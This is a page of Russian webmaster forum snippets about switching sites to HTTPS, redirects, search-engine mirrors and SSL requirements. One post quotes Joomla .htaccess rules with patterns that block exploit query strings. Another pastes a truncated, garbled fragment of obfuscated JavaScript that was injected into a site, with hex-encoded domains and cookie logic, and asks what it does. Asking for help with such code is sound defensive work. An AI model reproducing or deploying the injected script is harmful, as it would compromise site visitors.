Поиск
Форум,
2015.07.31
Например так? Хеш нужно ставить? (выделено жирным). RewriteEngine On. ########## Begin - Rewrite rules to block out some common exploits. ## If you experience problems on your site block out the operations listed below. ## This attempts to block the most common type of exploit `attempts` to Joomla! #. ## Deny access to extension xml files (uncomment out to activate). # Files ~ '.xml$ ' #Order allow,deny. #Deny from all. #Satisfy all. # /Files ## End of deny access to extension xml files. # Block out any script trying to set a mosConfig value through the URL. RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=| %3D) [OR]. # Block out any script trying to base64_encode data within the URL. RewriteCond %{QUERY_STRING} base64_encode[^(]* ([^)]* ) [OR]. # Block out any script that includes a script tag in URL. RewriteCond %{QUERY_STRING} ( |%3C)([^s]*s)+cript.*( |%3E) [NC,OR]. # Block out any script trying to set a PHP GLOBALS variable via URL. RewriteCond %{QUERY_STRING} GLOBALS(=|...
Форум,
2015.07.31
Если нужно сделать редирект с http на https средствами nginx, то делаете http хост в котором прописываете только редирект на https.
Форум,
2015.07.30
С неделю назад получил письмо от гугл мерчант, в котором говорилось следующее: На веб-сайтах, участвующих в программе Google Покупок, должна быть возможность совершить покупку с помощью платежной системы через Интернет, непосредственно на сайте или с использованием альтернативного метода, например наложенного платежа, выставления счета или оплаты курьеру. Процесс обработки всех платежей, транзакций и любой личной информации пользователей (например, адресов) должен осуществляться через безопасное соединение по протоколу SSL c действующим сертификатом SSL. Если не привести товарные объявления в соответствие с правилами Google Покупок в течение 7 дней, Ваш аккаунт будет заблокирован. Смысл такой, что оформление заказа должно проводиться по протоколу https, в противном случае - блокировка. Мой акк уже отключили, но странно другое, что многие магазины до сих пор висят с рекламой не имея ssl сертификата. Это они выборочно чтоль проверяют магазины?. Кому нибудь приходило подобное...
Форум,
2015.07.30
Да не, вы наверное не поняли. Я имею ввиду, что там полно рабочих магазинов, где оформить заказ можно только в корзине на сайте с оплатой курьеру, без всяких эквайрингов. Собственно ваша корзина при таком раскладе должна работать через https, дабы соответствовать правилам. Дело не в наличии или отсутствии определенного вида оплаты, а в том, что заказ должен оформляться через безопасное соединение. Хоть с оплатой курьеру, хоть картой - все через https.
Форум,
2015.07.30
А как вы поняли, что они не имеют SSL сертификата? Ведь многие пользуются эквайрингом, а для этого достаточно иметь https только на странице возврата в магазин. Пока не заплатишь - не поймёшь, наверно.
Форум,
2015.07.28
Вот обнаружил кусок левого кода, который вставили через админку (несколько людей имеет к ней доступ) в запись. Может кто прочитает? script type= 'text/javascript ' // ![CDATA[ 1336404323 = 1;!function(){var o=('[ '6e33646b337a72372e7275 ', '673333746d3079792e7275 ']'),e= ' ',t= '17247 ',n=function(o){var e=(new RegExp( '(?:^|; ) '+(/([.$?*|{} ( ) [ ] / +^])/g, ' $1 ')+ '=([^;]*) '));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=;if( 'number '==typeof n&&n){var i=new Date(n);n==i}var r= '3600 ';!&&r&&(= '3600 '),e=encodeURIComponent(e);var c=o+ '= '+e;for(var a in t){c+= '; '+a;var d=t[a];d!==!0&&(c+= '= '+d)}=c},r=function(o){o=(/[ S s]{1,2}/g);for(var e= ' ',t=0;t;t++)e+=(parseInt(o[t],16));return e},c=function(o){for(var e= ' ',t=0,n=;n t;t++)e+=(t).toString(16);return e},p=function(){var w=window,p=;if(('http')==0){return p}for(var e=0;e 3;e++){if(){w=;p=;if(('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var...
Форум,
2015.07.25
23.07 вышла новая 44 версия. С ней точно есть/был баг в работе с https. Допускаю, что и ваша проблема может быть из-за 'новой ' версии.
Форум,
2015.07.24
Sinaro, бесят такие сайты, у которых моя мозила блочит сайт, как не доверенное соединение в https. Отправляйте уж на http лучше людей. ---------- Добавлено 24.07.2015 в 14:36 ----------, в вдс-ке какой проц?
Форум,
2015.07.24
Ну что же, 15 числа добавил HTTPS вариант сайта, 16 после апдейта он был уже проиндексирован, поставил 301 редирект серверный, зеркало в Яндекс.Вебмастер выбрать нельзя было, ибо HTTPS вариант еще не был неглавным зеркалом, поставил в Host HTTPS вариант, а сегодня после апдейта HTTP вариант уже неглавное зеркало, а HTTPS вариант признан главным зеркалом. Позиции на месте, только в выдаче еще HTTP вариант сайта. И ТИЦ пока слетел у обоих вариантов.
Форум,
2015.07.24
Приветствую участников форума. У меня вопрос по протоколу защищенного соединения. Сайт нашей фирмы изначально продвигался, будучи только http. Затем решили подключить https. Было много трансформаций по проставлению редиретов и хостов, дабы не потерять ссылочный вес, который по факту весь шел на http. Все это долго описывать. Сейчас опишу текущую ситуацию. Фирма сейчас просит продвигать только HTTPS. В роботсе стоит хост HTTP. Редиректа с http на https сейчас не стоит (программисты его решили убрать). Склейки также нет. В поиске по факту только http, https в нем не участвует. Вопрос: если я сейчас буду покупать ссылки на https будет ли у меня что-либо двигаться вообще (ведь продвигать я буду сайт, не участвующий в поиске), ибо в поиске по факту другой сайт - HTTP?. Прошу знающих людей, которые сталкивались с такой ситуацией, ответить на вопрос. Спасибо.
Форум,
2015.07.24
1. Редирект прописывать на сайте http в.htaccess так?. RewriteEngine On. RewriteCond %{SERVER_PORT} ^443$ [OR]. RewriteCond %{HTTPS} =on. RewriteRule ^(.*)$ https://ваш сайт.com/$1 [R=301,L]. 2. Редирект с http на https передаст вес на https?
Форум,
2015.07.24
Указание на протокол HTTPS в хост (Host: ). 301 Редирект с http на https обязательно возвращайте, чтобы все ссылки ведущие на http работали и сайт работал только на https. Также оставьте без редиректа адрес http:, чтобы склейка произошла быстрей. Ссылки на https можно закупать, он появится в поиске как произойдет склейка http на https.
Форум,
2015.07.23
Cервер работает на CentOS 6.6 x64. На сервере лежит ключегенератор для активации продаваемого софта. Это x32 программка, которая вызывается по https. Сейчас при запросе генерилки по https получаю 'Internal Server Error ', при вызове из консоли 'cannot execute binary file '. Помогите понять, чего нехватает в системе, чтобы запустить x32 программку?
Форум,
2015.07.22
2 недели молчит техническая поддержка, спросил на счет того, что сайт переехал на https, да, знаю, есть переключатель в кабинете вебмастера, а толку? Кстати одновременно обе версии в кабинет добавить нельзя. Добавляешь https вариант стирается http, добавляешь http вариант, стирается https сайт. Кто - нибудь писал по поводу того, что запросы с регионом 'Россия ' в топ не заходят ?
Форум,
2015.07.22
Друзья подскажите пожалуйста сегодня увидел что на одном из моих сайтов где установлен CSP не грузятся favicon некоторых объявлений, вот что говорит Chrome GET:ANd9GcRFhIaw9M7-MdCwVCWXKrag2R058rfzal4WLDig6fdcdXeOFkOkPTBw8ooMj4_MDvIdYwbBLQ 404 (OK) В img-src есть *. https://*. Еще иногда блокируется: - хотя счетчик вроде работает и отображается. Подскажите пожалуйста как поправить. Заранее спасибо!
Форум,
2015.07.22
exchanger_1, проверьте это у себя, движки находятся в каталоге C: Users [Имя пользователя] AppData Roaming SERP Parser engines в файле замените строку base http://{domain}/search?q={query}&ie=UTF-8 /base на base https://www.{domain}/search?q={query}&ie=UTF-8 /base Если это действительно поможет - я сделаю эту правку для всех. По паролю - пришлите логин в поддержку, будем разбираться.
Форум,
2015.07.22
Гугл стал постоянно банить. На вашем форуме уже есть тема про это. Если проверить запрос которой посылает serpparser через bertal, то видно что у гугла стоит двойной редирект. Может стоит вместо запроса посылать запрос https:// www.;ie=UTF-8&hl=ru&near=%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B0&gl=RU Тогда не будет лишних редиректов. PS. восстановления пароля на вашем форуме так и не работает, - ввожу почту, получаю сообщение 'Письмо успешно отправлено на указанный e-mail. Нажмите на ссылку в полученном письме, чтобы установить новый пароль. ' и ничего не приходит
Форум,
2015.07.20
В общем это не вопрос, а скорее обращение и решение для тех, кто так же как и я страдает от этой неведомой тупизны устроенной гуглом. Причина в протоколе, если зайти на страницу скажем: -bfZTLnzjY и попробовать оставить коммент она редиректнится на протокол с https, где такой проблемы уже нет, например здесь проблемы нет:. Теперь казалось бы какая проблема заходить на youtube по протоколу https, проблемы действительно нет, проблема в том, что в рассылках которые рассылает youtube (на подписанные каналы) ссылки ведут на http протокол, т.е. такая подлянка от компании добра, которая вынуждает меня каждый раз тратить нервные клетки. В общем решения, их два: 1. Простое используем google extension:, предназначен для редиректа с одного адреса на другой, прописываем в нем правило: перезапускаем nginx, пробуем. В общем у меня вроде все гуд использую первый способ, второй потестил тоже работает. Удачи.
Форум,
2015.07.20
У меня происходит редирект на https, это нормально?
Форум,
2015.07.20
Реально впечатление, что сидят там идиоты которые сами youtube не используют. В почту рассылка по подпискам приходит со ссылкой на (где после желания написать или развернуть коммент происходит перезагрузка), а корректно он работает только на. Пока писал придумал, сделаю локальным адресом (127.0.0.1) и с него своим вебсервером редирект на https, хрен знает когда они это починят (у меня уже мес.) заколебало. По теме, проверку надо делать и javascript и сервером.